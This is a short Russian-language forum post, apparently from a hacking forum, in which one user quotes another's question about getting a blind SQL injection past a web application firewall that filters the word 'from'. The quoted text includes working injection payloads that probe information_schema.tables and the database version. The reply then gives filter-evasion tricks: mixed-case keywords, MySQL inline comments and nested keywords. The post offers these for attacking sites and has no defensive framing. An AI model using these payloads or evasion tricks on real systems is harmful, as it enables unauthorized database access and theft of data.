10.12.2016, 12:53
|
|
Познающий
Регистрация: 13.10.2016
Сообщений: 33
С нами:
5043926
Репутация:
0
|
|
Сообщение от elvir
↑
Как обойти WAF если фильтрует слово from при такой подстановки:
+and+ascii(substring((select+table_name+from+infor mation_schema.
tables+limit+1,1),1,1 ))>0--
а так всё нормально:
+and+substring(version(),1,1)=5--
посмотри здесь /threads/56409/
плпробывать разный регистр FRom,FrOm,и т.д или /*!from*/ может даже FRfromOM
|
|
|